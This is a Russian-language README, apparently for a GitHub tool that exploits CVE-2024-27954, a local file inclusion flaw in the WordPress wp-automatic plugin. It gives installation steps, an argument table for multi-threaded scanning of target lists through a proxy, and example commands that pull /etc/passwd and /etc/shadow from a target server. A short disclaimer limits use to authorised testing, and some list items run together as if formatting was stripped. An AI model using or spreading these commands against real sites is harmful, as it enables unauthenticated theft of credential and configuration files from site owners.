
Сканер на Python для CVE-2024-27954, уязвимости включения локальных файлов в плагине WordPress wp-automatic. Поддерживает многопоточное сканирование, интеграцию прокси и тестирование пользовательских путей к файлам.
Этот проект представляет собой сканер уязвимости локального включения файлов (Local File Inclusion, LFI) на Python, нацеленный на CVE-2024-27954 — критическую ошибку в плагине WordPress wp-automatic. Уязвимость позволяет неаутентифицированным злоумышленникам читать произвольные файлы на сервере с помощью вектора инъекции file://.
wp-automatic/etc/passwd, конфигурационные файлы, исходный код)link с использованием схемы file://requestsУстановка зависимостей:
pip install requests
python3 CVE-2024-27954.py --url http://TARGET --lfi-path /etc/passwd
| Аргумент | Описание |
|---|---|
--url | Одиночный целевой URL (например, http://TARGET:8080) |
--list | Файл со списком целевых URL (по одному на строку) |
--lfi-path | Одиночный путь к файлу для проверки (по умолчанию: /etc/passwd) |
--paths-file | Файл с несколькими путями к файлам (по одному на строку) |
--proxy | Прокси (например, http://127.0.0.1:8080) |
--output | Файл для сохранения уязвимых результатов |
--threads | Количество параллельных потоков (по умолчанию: 3) |
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/passwd --proxy "http://127.0.0.1:8080" --output results.txt
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/shadow --proxy "http://127.0.0.1:8080" --output results.txt

Этот инструмент предназначен только для образовательных и авторизованных тестов на проникновение. Несанкционированный доступ к системам может быть незаконным. Используйте ответственно.